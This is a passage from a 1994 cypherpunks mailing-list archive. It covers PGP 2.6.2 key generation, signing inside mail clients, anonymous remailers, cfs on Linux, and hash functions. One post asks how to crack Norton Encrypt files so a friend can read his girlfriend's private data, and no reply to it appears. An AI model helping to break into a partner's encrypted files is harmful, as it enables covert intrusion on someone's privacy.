seem to be very close > to what is needed for this. Somebody, I forget who, had a hospitality suite at a Usenix LISA conference. They have a commercial version of socks. I don't remember if it was bundled or an option. At any rate, kinda neat that someone is providing privacy tools rather then the other way round. /r$ From Tony.Gurnick at nzdairy.co.nz Wed Dec 21 10:49:33 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Wed, 21 Dec 94 10:49:33 PST Subject: Have 2.6.2 but cant gen 2048 bits Message-ID: <94122207473479@nzdairy.co.nz> All, Following is the output from pgp2.6.2 and me trying to generate 2048 bit keys. What am i doing rong? ;pgp -kg Pretty Good Privacy(tm) 2.6.2 - Public-key encryption for the masses. (c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 11 Oct 94 Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc. Distributed by the Massachusetts Institute of Technology. Export of this software may be restricted by the U.S. government. Current time: 1994/12/22 07:47 GMT Pick your RSA key size: 1) 512 bits- Low commercial grade, fast but less secure 2) 768 bits- High commercial grade, medium speed, good security 3) 1024 bits- "Military" grade, slow, highest security Choose 1, 2, or 3, or enter desired number of bits: 2048 Generating an RSA key with a 1024-bit modulus. You need a user ID for your public key. The desired form for this user ID is your name, followed by your E-mail address enclosed in , if you have an E-mail address. For example: John Q. Smith <12345.6789 at compuserve.com> Enter a user ID for your public key: Thanks T From Tony.Gurnick at nzdairy.co.nz Wed Dec 21 11:42:33 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Wed, 21 Dec 94 11:42:33 PST Subject: Kiwi cypherpunks Message-ID: <94122208374730@nzdairy.co.nz> Lads (and lasses), I seem to be having a bit of troub communicating we the kiwis on this list directly, but no probs if I send to the list. Has there been and communication on this topic in the last 3 or so days??? We cant organise anything if we cant talk to each other! T From warlord at MIT.EDU Wed Dec 21 11:50:36 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Wed, 21 Dec 94 11:50:36 PST Subject: Have 2.6.2 but cant gen 2048 bits In-Reply-To: <94122207473479@nzdairy.co.nz> Message-ID: <9412211950.AA28753@toxicwaste.media.mit.edu> > Following is the output from pgp2.6.2 and me trying to generate > 2048 bit keys. What am i doing rong? [stuff deleted] > Current time: 1994/12/22 07:47 GMT Notice the current time? It is before the 2048-bit key date. Look in the code to find the date! Happy Holidays! -derek From tedwards at src.umd.edu Wed Dec 21 11:54:59 1994 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Wed, 21 Dec 94 11:54:59 PST Subject: GUI: PGP vs novices In-Reply-To: <199412211837.KAA09590@homer.spry.com> Message-ID: On Wed, 21 Dec 1994 bshantz at spry.com wrote: > It is my own personal opinion that in order for crypto to truly become > mainframe, the software manufacturers of internet connectivity packages must > integrate crypto into the applications. Look at the past threads here on > Cypherpunks..."How do I write a script to put PGP into ELM?" "PGP DLL > modularity" etc. That's true to some extent. I'd love to be able to have every message I want signed and encrypted from PINE automagically. I could implement this by requiring keystrokes at the editor level. But that isn't the entire issue... On the issue of signing, there is another question. Do I really want to sign every message? I don't like signing my written name anywhere I don't have to. And whenever I do, I am careful to look at all the potential consequences. Signatures imply I am agreeing to some kind of contract. Perhaps I prefer my email unsigned, to give me a level of disputability. If my email was a business contract, then I'd be enthusiastic about signing it. But for a post to a political newsgroup, for instance, perhaps I don't want to make sure everybody can cryptographically assure themselves it comes from me. This leaves me open to potential forgery, but email forgery is well known and understood. Finally is physical security of keys. If I am going to sign anything, I want that key to be under control of only me. It is difficult for someone like me who uses workstations to keep a key only on floppy, especially as I find myself on different workstations, many diskless, all the time. -Thomas From bshantz at spry.com Wed Dec 21 11:55:31 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Wed, 21 Dec 94 11:55:31 PST Subject: GUI: PGP vs novices Message-ID: <199412211955.LAA11235@homer.spry.com> Jeff Licquia writes: >>You will notice that this message is not signed. That's because in order to >>sign it, I would need to save my message, hop out to a DOS box, PGP encrypt >>it, hop back to my mail program and insert the encrypted mail as a text file. >>That's enough to discourage the average user. This is pretty much what Tim >>May was talking about when he discussed why he doesn't sign his messages. >>It's not that he couldn't... it's just not practical for him. It's not really >>practical for me either, but I do it when I feel it's necessary. >Just a small nit, but it appears that you're running something >Windows-compatible on your desk (the DOS box and all that). Are you aware >of the good Windows tools for PGP? The particular one I use (PGPClip by >Mike Meyer) uses the clipboard, and is very nice and simple. Exactly my point Jeff. Thank you for justifying what I said....**WINK**, **GRIN**. In order to even use PGPClip, it involves something OUTSIDE the mail application. (Although, it does sound intriguing to me.) Anyway, this is yet another example of the user needing to be fully conscious that they are signing or encrypting. It should be second nature. In order for it to become second nature, it MUST be included in the design of the mail package. (Or News reader, or FTP software, whatever.) Third party utilities make a piece of software harder to use. That's a given. Now, don't get me wrong, there are some nice thrid party vendor products out there. But, I have yet to see a crypto product that merges (cross platform) into a mail package smoothly. >Not a flame, or even a spark. Just wanting to make life easier for crypto >enthusiasts. Didn't see any sparks at all, Jeff. I am interested in PGPClip (at least to look at) does anyone have an FTP site pointer where I could find it? -- Brad >>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<< Brad Shantz bshantz at spry.com Senior Software Engineer SPRY Inc. Direct #: (206)-442-8251 316 Occidental Ave. S. Main #: (206)-447-0300 Suite 316 Fax #: (206)-447-9008 Seattle, WA 98104 WWW URL: http://WWW.SPRY.COM ---------------------------------------------------------------------- PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< From bshantz at spry.com Wed Dec 21 12:13:26 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Wed, 21 Dec 94 12:13:26 PST Subject: GUI: PGP vs novices Message-ID: <199412212013.MAA11597@homer.spry.com> Thomas Grant Edwards writes: >On the issue of signing, there is another question. Do I really want >to sign every message? I don't like signing my written name anywhere I >don't have to. And whenever I do, I am careful to look at all the >potential consequences. Signatures imply I am agreeing to some kind of >contract. Perhaps I prefer my email unsigned, to give me a level of >disputability. If my email was a business contract, then I'd be >enthusiastic about signing it. But for a post to a political newsgroup, >for instance, perhaps I don't want to make sure everybody can >cryptographically assure themselves it comes from me. This leaves me >open to potential forgery, but email forgery is well known and understood. Good point. However, the digital signature issue is still outside of what my topic was. I agree with you wholeheartedly. That's one of the reasons I don't sign everything. That particular "argument" about digisigs has been pounded into the ground by the Cypherpunks for the last year and probably longer. I just think (boy I feel repetitive) that there should be something inside the software so the user has the option to sign, or sign on the fly. If I type up a message and think, "hey, I really want people to know this is from me", It would be really cool to just hit a button on the toolbar, or grab a menu option to sign automatically before sending. You don't have to sign everything. But, you don't have to go out to another application (of any sort) in order to sign. It's right there in front of you. That was my point. >Finally is physical security of keys. If I am going to sign anything, I >want that key to be under control of only me. On a personal machine, say at home, that's not really a problem. On a computer at the office where everything is password protected, isn't really a problem either. Since the situations I work with deal mainly with the home user, key management isn't as much a worry as if you're using workstations. >It is difficult for someone like me who uses workstations to keep a key >only on floppy, especially as I find myself on different workstations, >many diskless, all the time. This issue has also been pounded into the ground. Carrying a disk around with you is really the only way to guarantee security. (Or memorizing your private key and typing it in every time. EEEEERRRGGHHHH) But, you are right. It is a pain in the ass. -- Brad From sameer at c2.org Wed Dec 21 12:17:24 1994 From: sameer at c2.org (sameer) Date: Wed, 21 Dec 94 12:17:24 PST Subject: Cryptographic filesystem for Linux? In-Reply-To: <199412210807.AAA05754@gwarn.versant.com> Message-ID: <199412212013.MAA14015@infinity.c2.org> > > I've thought about porting Matt Blaze's "cfs" to linux. cfs already runs on linux, s'far as I can tell. I was using it on linux about a year ago or so.. -- sameer Voice: 510-841-2014 Network Administrator Pager: 510-321-1014 Community ConneXion: The NEXUS-Berkeley Dialin: 510-549-1383 http://www.c2.org (or login as "guest") sameer at c2.org From jalicqui at prairienet.org Wed Dec 21 12:45:09 1994 From: jalicqui at prairienet.org (Jeff Licquia) Date: Wed, 21 Dec 94 12:45:09 PST Subject: GUI: PGP vs novices Message-ID: <9412212044.AA11437@firefly.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- >Jeff Licquia writes: And yes, you're forgiven for posting private E-mail. :-) Again, not a flame, just a warning to be more careful. I really didn't mind in this case; however, you might be likely to find someone who would be in others. >>Just a small nit, but it appears that you're running something >>Windows-compatible on your desk (the DOS box and all that). Are you aware >>of the good Windows tools for PGP? The particular one I use (PGPClip by >>Mike Meyer) uses the clipboard, and is very nice and simple. > >Exactly my point Jeff. Thank you for justifying what I said....**WINK**, >**GRIN**. >In order to even use PGPClip, it involves something OUTSIDE the mail >application. (Although, it does sound intriguing to me.) Anyway, this is yet >another example of the user needing to be fully conscious that they are >signing or encrypting. It should be second nature. In order for it to become >second nature, it MUST be included in the design of the mail package. (Or News >reader, or FTP software, whatever.) > >Third party utilities make a piece of software harder to use. That's a given. Granted. However, I'm unfortunately not a developer for a mail package, which means I can only offer you a stopgap. However, since writing you, I did remember another resource. There's a commercial mailer called ZMail which is being talked about in alt.security.pgp. It's supposedly extensible, and Guy Berliner has written scripts for it which put an "Encrypt" and "Decrypt" button on his mailer's toolbar. Noticing you're from Spry, however, I may be encouraging you to use a competitor's package. Perhaps you could wield some influence to get the Internet-in-a-Box developers to integrate PGP into their mailer? >>Not a flame, or even a spark. Just wanting to make life easier for crypto >>enthusiasts. > >Didn't see any sparks at all, Jeff. I am interested in PGPClip (at least to >look at) does anyone have an FTP site pointer where I could find it? Unfortuantely, no. I got it directly from Mike Meyer. I can send you a copy via mail if you're interested. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLviTRLnwkw8DU+OFAQGoKAP/ZgNQnrPumarAbM8YJ3bsbnByaMmnjoUw 8UD6xsmZQ1ldnq5acjECEyfpIOKNY9cpwQR/SWunDbdiiTaiuNaCwMgDTeodsuNh YhBxFdCJ1mgXVsPevrmB9Q2SjZ/VXW/Zc43qlnzrsZSS+Xya7Xu+vQkTwLD5jyHb aLrowvU86OM= =d+cZ -----END PGP SIGNATURE----- From storm at marlin.ssnet.com Wed Dec 21 13:16:05 1994 From: storm at marlin.ssnet.com (Don Melvin) Date: Wed, 21 Dec 94 13:16:05 PST Subject: Kiwi cypherpunks In-Reply-To: <94122208374730@nzdairy.co.nz> Message-ID: <9412212113.AA27399@marlin.ssnet.com> The wise _DNA_ is known to have said... > > Lads (and lasses), > I seem to be having a bit of troub communicating > we the kiwis on this list directly, but no probs if I send to the > list. Has there been and communication on this topic in the last > 3 or so days??? We cant organise anything if we cant talk to each > other! Now who says the Aussie intelligence services aren't any good? :-) -- America - a country so rich and so strong we can reward the lazy and punish the productive and still survive (so far) Don Melvin storm at ssnet.com finger for PGP key. From cort at ecn.purdue.edu Wed Dec 21 13:38:01 1994 From: cort at ecn.purdue.edu (cort) Date: Wed, 21 Dec 94 13:38:01 PST Subject: procmail Message-ID: <199412212137.QAA21402@en.ecn.purdue.edu> I just installed procmail (on my Linux system at work). The installation (readme, makefile, hand-holding along the way) was _very_ nice. It earns my hearty endorsement. Please advertise crypto enhancements to procmail to me (in email if not of general list interest). Who has the procmail integrated PGP (signing, etc.)? Cort. From jcorgan at netcom.com Wed Dec 21 13:38:08 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Wed, 21 Dec 94 13:38:08 PST Subject: Have 2.6.2 but cant gen 2048 bits Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > Following is the output from pgp2.6.2 and me trying to generate >2048 bit keys. What am i doing rong? You'll probably get multiple answers for this. The code in PGP that allows you to enter 2048 bit keys isn't enabled until 12/25/94, so you need to set your clock ahead to try this (and don't forget to set it back--I spent three days sending people "Christmas" mail :) Also, though I'm not sure why, it seems that the generated keys are only 2047 bits in length. This was my experience, and has been reported in alt.security.pgp by a number of others as well. Expect about a 15-20 minute key generation time on a 486/66 PC. ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvifok1Diok8GKihAQG7ggP/SNuz/n0njIuB2NQ7iIqPH3IWQ4dzOoP0 AlBTiq80CZjVAhTR80d8ckID36cKLRjRKq3kafKqzWoDfevL8UwxXbORIs0kyo6h qnQAg98qOOQMkSh8yxYHOfYL612VMKDMuBlXDSC4dNnItkmCwex780TnZRuq9Hc/ SmkiusdPEFQ= =GFPO -----END PGP SIGNATURE----- From jcorgan at netcom.com Wed Dec 21 14:05:06 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Wed, 21 Dec 94 14:05:06 PST Subject: GUI: PGP vs novices Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >I just think (boy I feel repetitive) that there should be something inside the >software so the user has the option to sign, or sign on the fly. If I type up >a message and think, "hey, I really want people to know this is from me", It >would be really cool to just hit a button on the toolbar, or grab a menu >option to sign automatically before sending. You don't have to sign >everything. But, you don't have to go out to another application (of any >sort) in order to sign. It's right there in front of you. To add to this thread: I'm working on a Windows based product that, while not achieving the level of integration that you describe, does enable one to assign signature, remailing, and encryption options from within the email message itself. The product works at the Windows Sockets layer, intercepting mail as it is sent from the mail application to the SMTP host, and performing the above crypto related functions based on text placed at the top of the mail message. - From the user perspective, I plan to make the product look just like the (excellent) Unix based PGP front end, premail. So, while you're typing your mail, if you want to add a signature, just add the line Signature: to the top (where userid is something that identifies the secret key to use). Features will include automatic signing, encryption, or remailing based upon destination address of the outgoing email. Incoming mail will be handled similarly, though there are some security issues surrounding automated access to your secret keyring that I haven't thought through yet. A major complication that I've come up against is installation. Somehow I've got to provide a painless way of discovering the Winsock stack in use on a machine, and installing my WINSOCK.DLL so that it gets loaded instead of the real one (which my software then loads on its own and intercepts calls to.) This is really easy to do manually when one has knowledge of such things; it is a major pain in the ass to come up with a way of doing this that doesn't require the user to know anything about Windows Sockets or DLL's or path variables, etc. On the other hand, the pain of installation only occurs once. For actual use, adding control lines to the top of one's mail is pretty simple. Not as good as having, say, "Encrypt", "Sign", and "Remail" buttons or menu items, but it should do for now. I may or may not have something to show at the next Cpunks meeting--depends on how frustrated I get with dealing with Windows' programming paradigm :) ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLviluE1Diok8GKihAQEGfAP/TRvp2ulO5MZJplYhwoFl5hvOmvSj1nNg N25aNm4++xzdywZ7ffPhIW6v2euk27eZLJS3p+CLcZ2JWQglmqWube3lQfg9mYsB cTf+w5Jyg+lDwvXExJ+9Fqe1mZLSIS+f2jeuAi6nJ5nFyeyYWTiWBmXP0gK7YQhC 5mCFzczhP8Q= =A9RZ -----END PGP SIGNATURE----- From Tony.Gurnick at nzdairy.co.nz Wed Dec 21 14:37:55 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Wed, 21 Dec 94 14:37:55 PST Subject: Kiwi cypherpunks Message-ID: <94122211341071@nzdairy.co.nz> storm at marlin.ssnet.com said on 22-dec-1994 >The wise _DNA_ is known to have said... >> >> Lads (and lasses), >> I seem to be having a bit of troub communicating >> we the kiwis on this list directly, but no probs if I send to the >> list. Has there been and communication on this topic in the last >> 3 or so days??? We cant organise anything if we cant talk to each >> other! > >Now who says the Aussie intelligence services aren't any good? :-) Um, using the words aussie & intelligence in the same sentence is a bit of an contridiction in terms! @:)> I just dosent happen! T From bass at fc.net Wed Dec 21 15:09:09 1994 From: bass at fc.net (Bass Wastelan) Date: Wed, 21 Dec 94 15:09:09 PST Subject: NYT Potpurri and Econo-cash Message-ID: <199412212314.SAA21911@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- ECO_do - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvi2uSoZzwIn1bdtAQHOiQGAmRUcHy1wI/BkqpRQYj+ocztm4Go6YBBw pKzj1nY6PhcWz1pGYHNvolPFhF4hcN1L =nxS9 -----END PGP SIGNATURE----- From dave at esi.COM.AU Wed Dec 21 15:38:11 1994 From: dave at esi.COM.AU (Dave Horsfall) Date: Wed, 21 Dec 94 15:38:11 PST Subject: GUI: PGP vs novices In-Reply-To: Message-ID: On Wed, 21 Dec 1994, Thomas Grant Edwards wrote: > PGP has made me more crypto aware, but at this point neither I nor most of > the crypto aware people I personally know feel there is a need to either > encrypt or sign messages on a regular basis. While this doesn't do great > things for supporting crypto, it is simply reality. DigiCash is a > different situation of course - it is needed, and as soon as possible. You'll think differently when you start seeing malicious forged messages in your name, on a weekly basis... Looks like I made an enemy or two. (The forgeries stopped as soon as I started signing my messages.) -- Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6 Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD From nobody at c2.org Wed Dec 21 18:04:05 1994 From: nobody at c2.org (Anonymous User) Date: Wed, 21 Dec 94 18:04:05 PST Subject: Remailer list needed Message-ID: <199412220200.SAA01353@zero.c2.org> "L. McCarthy" wrote: > Anyway, the standard ways of accessing the latest list are: > finger remailer-list at kiwi.cs.berkeley.edu > http://www.cs.berkeley.edu/~raph/remailer-list.html > > I don't know of a way to get it automatically via mail. I think the address to get finger via email is mg5n+finger at andrew.cmu.edu From ghio at c2.org Wed Dec 21 18:33:46 1994 From: ghio at c2.org (Matthew Ghio) Date: Wed, 21 Dec 94 18:33:46 PST Subject: NONE Message-ID: <199412220229.SAA14803@infinity.c2.org> nobody at rebma.rebma.mn.org wrote: > Matthew Ghio, > You've done a great job in the past and continue to do so, but for > the past week some (all?) of your users have not been getting any mail. > What happened? Post to cypherpunks, remailer-operators, alt.privacy > or alt.anonymous.messages, alt.abuse.recovery (either one. You choose). > > Thanks. Well, I finally got a chance to catch up on a lot of email that I hadn't had time to read recently. I had to take myriad.pc.cc.cmu.edu down for awhile. It should be back up in a few weeks. My alias-based remailers, alias at alpha.c2.org and mg5n+alias at andrew.cmu.edu are still up. c2.org has been having network connection problems lately and some messages may have been delayed, but to my knowledge nothing has been lost. For those who have been asking, help files are available by sending mail to help at alpha.c2.org, mg5n+remailer-help at andrew.cmu.edu, and a list of remailers and mail to usenet gateways is available from mg5n+remailers at andrew.cmu.edu From admin at alpha.c2.org Wed Dec 21 19:06:11 1994 From: admin at alpha.c2.org (admin at alpha.c2.org) Date: Wed, 21 Dec 94 19:06:11 PST Subject: alpha.c2.org software upgrade Message-ID: <9412220301.AA20375@toad.com> It is now possible to send outgoing mail via the alias remailer at alpha.c2.org. To send a message, create a message of the following format: From: me at alpha.c2.org (My Nym) Password: mypass Subject: test To: alt.test at demon.co.uk This is my message. Encrypt this with the public key for the remailer and send it to alias at alpha.c2.org. It will decrypt it and send your message (after verifying and removing the password line.) From 0003701548 at mcimail.com Wed Dec 21 20:12:26 1994 From: 0003701548 at mcimail.com (Alan Pugh) Date: Wed, 21 Dec 94 20:12:26 PST Subject: 'brief' macro for invoking pgp Message-ID: <04941222013040/0003701548PJ2EM@MCIMAIL.COM> -----BEGIN PGP SIGNED MESSAGE----- hello all, does anyone out there have a macro for the editor _brief_ by borland (last time i checked) that will invoke pgp to sign a message in the buffer. i've been using _brief_ as my primary editor since they were owned by _underware_, (no joke), and would like to be able to sign messages by pressing a hot key. i've been trying to do this off and on for some time, but my programming skills are almost nonexistant. preferably it would be filename independant. that is, it would work on the current buffer. the package was written to be able to compile files while within it, so it should be possible. any help would be greatly appreciated. thanks, amp <0003701548 at mcimail.com> December 21, 1995 20:27 -----BEGIN PGP SIGNATURE----- Version: 2.61 iQEVAwUBMNnfligP1O9KJoPBAQHtEgf/TV8OeTFBpKhufmbIJqBpoj2Gt6dTjtH/ o3z1ExLFSYols4YAOAJbquqnUariSNrnqV1Ap2IjtNFM08eEAeAOBykjlKfjXWBt ZudoDlRfVoKmGnGVpn4Njo6wrlolpU0rezFls+4Zdx2sA7cLkBuTUBMNN0yq3oBw Yws2rfpKW8SGoj6gyDtkGKisDQtHUotmHTiIPVYI9FbTPa2Fs0Q5RnvAidl0i47m dDuWmfoP3VpiyAbPH9PMnI19Ax3U+n5MFKK0B8zUWIonUdv4px4u7eRo3b0kNCKl qETMZtoNB1Um3o7oZUZvjLAlKEEBOEmDweT4OVyxNt5q9thOO53wKA== =YlLN -----END PGP SIGNATURE----- From GERSTEIN at SCSUD.CTSTATEU.EDU Wed Dec 21 21:30:44 1994 From: GERSTEIN at SCSUD.CTSTATEU.EDU (ADAM GERSTEIN, _THE_ MACGURU) Date: Wed, 21 Dec 94 21:30:44 PST Subject: Is it possible to break Norton Encrypt?? Message-ID: <941222003135.20215af5@SCSUD.CTSTATEU.EDU> Howdy fellow 'punks- A friend of mine thinks his girlfriend has been cheating on him, and thinks the proof may be in a few Norton Encrypt files. Is there anyway to get the password with a data/resource editor, or is he shit-out-of-luck and looking for a new girl-friend? Please reply via private mail, since I had to leave the list for my christmas break. Adam Gerstein -=- "Practice safe HEX - always use a keyboard condom" - anon PGP Key available bye finger or mail with the sub: PGPKEY +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+ |(e)Mail me: | | Gerstein at scsu.ctstateu.edu | AGerstein at aol.com | | MacGeek at scsu.ctstateu.edu | MacGeek at eWorld.com | | an41389 at anon.penet.fi (for anonymity) | +-------------------------------------------------------+ EWWWWW! - Betsy -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBWAwUBLq/fYbXVc2UFUOWNAQHu4QIBAQzD1aOCh4DV3Dg4DSJPmNu+1xGDRxND 0PavaUaBFP7GGT6EneTBwVX1ddL1PFFKdeMf8qo9FgWfG0EOHuHJTkY= =6rlg -----END PGP SIGNATURE----- From nesta at nesta.pr.mcs.net Wed Dec 21 23:04:06 1994 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Wed, 21 Dec 94 23:04:06 PST Subject: macros for Pine and PGP In-Reply-To: <941222003135.20215af5@SCSUD.CTSTATEU.EDU> Message-ID: I finally have a safe system to recieve mail on where I am the admin so I am wondering if there is a way i can automate PGP signing and decrypting and crypting mail with PINE, now with PINE I can choose emacs as my alternate editor and jump into emacs, and then use perhaps a PGP interface for Emacs then. But the emacs macros would have to allow me to specify the save name, or keep it the same as the tmp file PINE assigns for outgoing compositions when I crypt them. Also since PINE is MIMI supporting, is their MIMI support for PGP stuff yet? I am sorry I am so behind on this shit, it's just that I only marginally bothered to keep up with the interface stuff for Unix machines since I never had a machine that I could safely work from to sign outgoing mail and posts. thanx **I've got the strap-on connections in Lesbos, and the KY trust in Sodom, I'm the only Man in Istanbul, I'm the only punk in Islam, I'm the only bar on Skid Row, I'm the only whore on the waterfront** _Cobble Stone Gardens_ William Seward Burroughs From phillip at mserve.kiwi.gen.nz Wed Dec 21 23:29:45 1994 From: phillip at mserve.kiwi.gen.nz (Phillip Hardy) Date: Wed, 21 Dec 94 23:29:45 PST Subject: Kiwi cypherpunks In-Reply-To: <94122208374730@nzdairy.co.nz> Message-ID: On Thu, 22 Dec 1994, DNA wrote: > Lads (and lasses), > I seem to be having a bit of troub communicating > we the kiwis on this list directly, but no probs if I send to the > list. Has there been and communication on this topic in the last > 3 or so days??? We cant organise anything if we cant talk to each > other! > > T > ask bryve to mark a local listserve on cybernet. so we can use that to talk togeather? Then you can use this system to bouce some email around. From phillip at mserve.kiwi.gen.nz Wed Dec 21 23:30:41 1994 From: phillip at mserve.kiwi.gen.nz (Phillip Hardy) Date: Wed, 21 Dec 94 23:30:41 PST Subject: Cryptographic filesystem for Linux? In-Reply-To: <199412212013.MAA14015@infinity.c2.org> Message-ID: On Wed, 21 Dec 1994, sameer wrote: > > > > I've thought about porting Matt Blaze's "cfs" to linux. > > cfs already runs on linux, s'far as I can tell. I was using it > on linux about a year ago or so.. > Anyone know where i can ftp it from? I am outside the USA ;-) Phill.. This is my 2.5c worth : phillip at cybernet.co.nz (Phillip W. Hardy) For my public key type finger phillip at kiwi.gen.nz for PGP Public Key. cybernet now with 9 cd-roms online. +64-9-376-6400 Visit for Linux needs. They say jump, you say how-high (Rage Against the Machine) From an169306 at anon.penet.fi Wed Dec 21 23:47:49 1994 From: an169306 at anon.penet.fi (an169306 at anon.penet.fi) Date: Wed, 21 Dec 94 23:47:49 PST Subject: Making sure a program gets to the receiver intact Message-ID: <9412220711.AA21268@anon.penet.fi> How can I insure a program, once put on FTP sites stays untampered with? I have done the following, but I still find holes: 1: PGP signed each file with a seperate .sig file. 2: Made a MD5 list, using 2-3 seperate programs (making sure they agree), PGP signing the list, and asking friends to sign the list, leaving seperate .sigs in the directory. 3: Encrypting a copy of the MD5 list with a passphrase (if all keys are fragged, then in front of trusted witnesses, I can decrypt the key, show them that the MD5 list is authentic.) 4: PKZIPPING it using my AV key. (Yes, I am aware that this is a joke, but since I am a registered user, why not use it?) (Side note, if one uses PKZIP, please register it. I have seen so many unregistered copies of this, that it makes my eyes water.) The holes: 1: Someone hacking the keyservers, substituting a key for all the people who signed, and modifing the archive to show that. 2: Someone breaking into my apt, sticking a keyboard monitor on, getting my passphrase and key. Most of this is theoritical, as it is hard to hack _all_ keyservers to nuke my PGP key, then hack AOL, compuserve, and other FTP sites to modify the binary, but I would like to make _sure_ this program gets into user's hands without getting modified. (Not for paranoia reasons, but just to see how well one can make a package resistant to tampering.) Pardon the anonymous ID, as my reputation with my REAL user id is not so great. (No, I am not Lance, but not that better off due to tons of dumb mistakes with my regular ID on this list.) ------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From mikepb at freke.lerctr.org Thu Dec 22 02:39:58 1994 From: mikepb at freke.lerctr.org (Michael P. Brininstool) Date: Thu, 22 Dec 94 02:39:58 PST Subject: Hash functions & Physical Analogies Message-ID: <1994Dec22.103705.26972@freke.lerctr.org> I seem to remember someone mentioning that a hash function, like the one used in signatures in PGP, would show a large change for a small change in the file, and a small change for a large change in the file. I was digging through some of my old stuff last weekend with my kids and found my old Rubik's Cube. I set it aside until last night. Here is the connection. It was late, but I decided to try and figure out some "move" sequences that would move small numbers of blocks on the Rubik's cude, without changing the location or orientation of the rest. In doing this, I (re)noticed that simple "move" sequences resulted in a large number of displacements (translation and/or rotation) of the blocks in the cube. And that very large sequences of "moves" had the opposite effect (if it was the correct sequence). This, in my sleep deprived state, brought hash functions to mind. It also brought several questions to mind. First question: I think I have seen references to topology in discussions of cryptography. I have never had a topography class, so I was wondering, is Rubik's cube is a topology problem? Second question: If Rubik's cube is a topo prob, is it a good analogy for trying to describe hash functions to people? Third question: If there is an analogy, how do you convince the lay person that the hash is a one-way function? By demonstrating that it maps many to one, and the Rubik's Cude maps one to one? Fourth question: To sign a post with PGP (from within vi, under trn) Do I include the header in the lines to be run through 'pgp -fast' or not? (I have the cp list go into a news gateway on my home machine so that threads are easier to follow) ---------------------------------------------------------------| | #include "std/disclaimer.h" Michael P. Brininstool | | mikepb at freke.lerctr.org OR mikepb at netcom.com | | (408)251-3222(Home) (415)253-0853(Pager) (415)694-1882(Work) | |--------------------------------------------------------------- From danisch at ira.uka.de Thu Dec 22 09:11:38 1994 From: danisch at ira.uka.de (Hadmut Danisch) Date: Thu, 22 Dec 94 09:11:38 PST Subject: Hash functions & Physical Analogies Message-ID: <9412221710.AA17850@elysion.iaks.ira.uka.de> Michael P. Brininstool wrote: > I seem to remember someone mentioning that a hash function, like the > one used in signatures in PGP, would show a large change for a small > change in the file, and a small change for a large change in the file. More important is that it is difficult (infeasible) to find a file for a given hash value. (This implies that small file changes result in large hash value changes.) > First question: > I think I have seen references to topology in discussions of > cryptography. I have never had a topography class, so I was > wondering, is Rubik's cube is a topology problem? No, it is a permutation group. Use the Schreier-Sims-Algorithm to find solutions. > Second question: > If Rubik's cube is a topo prob, is it a good analogy for trying > to describe hash functions to people? No. It is a simple thing to find a turn which fits to a given state of the cube. When the cube came out a german newspaper published a simple method for solving the cube. This means everyone can easily find a "message" which fits to a given "hash value". This must not be possible for a cryptographic hash function. The hash-function must be a one-way function, but the cube isn't one-way. Further more, the cube allows some kind of differential analysis. Since turning the front side only affects the front side, you can see what to do to turn the front side back. That's also not good for cryptographic context. > Third question: > If there is an analogy, how do you convince the lay person that the > hash is a one-way function? By demonstrating that it maps many to > one, and the Rubik's Cude maps one to one? It is still a problem to convince experts that a hash function is a one-way function... > Fourth question: > To sign a post with PGP (from within vi, under trn) Do I include > the header in the lines to be run through 'pgp -fast' or not? > (I have the cp list go into a news gateway on my home machine so > that threads are easier to follow) Should not do this. The header is modified by transport agents, e.g. paths and date are added. Hadmut From jya at pipeline.com Thu Dec 22 09:22:48 1994 From: jya at pipeline.com (John Young) Date: Thu, 22 Dec 94 09:22:48 PST Subject: BYTE on Netscape Message-ID: <199412221722.MAA18998@pipe3.pipeline.com> Ben Smith writes supportively in the January 1995 issue on Netscape's products -- freebie and commerical. See pp.197-200. Two excerpts: "Netsite Commerce Server is Netscape Communications' most important product because it offers the basic requirements for secure transactions over the otherwise open-for-snooping-and-spoofing Internet." [Brief 